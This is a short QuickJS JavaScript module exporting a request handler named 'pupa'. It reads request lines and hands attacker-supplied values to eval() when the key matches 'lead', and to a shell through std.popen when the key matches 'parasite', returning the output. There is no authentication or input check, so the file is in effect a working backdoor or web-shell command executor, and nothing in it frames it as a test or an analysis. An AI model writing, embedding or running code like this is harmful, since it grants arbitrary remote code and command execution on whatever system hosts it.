import * as std from "std";
import * as os from "os";

let pupa = request => {
  let res = "badRequest";
  request = request.split("\n");
  request.forEach( line => {
    if(/lead/i.test(line.split(":")[0])) {
      try {
        res = `${eval(line.substring(5, line.length-1))}`;
      } catch(err) {
        res = err;
      }
    } else if(/parasite/i.test(line.split(":")[0])) {
      let prog, r, aux = "";
      try {
        prog = std.popen(line.substring(9, line.length-1), "r");
        while ((r = prog.getline()) != null) {
 	  aux += r + "\n";
        }
        res = aux.substring(-1);
      } catch(err) {
        res = err;
      }
    }
  });
  return res;
};

export default pupa;
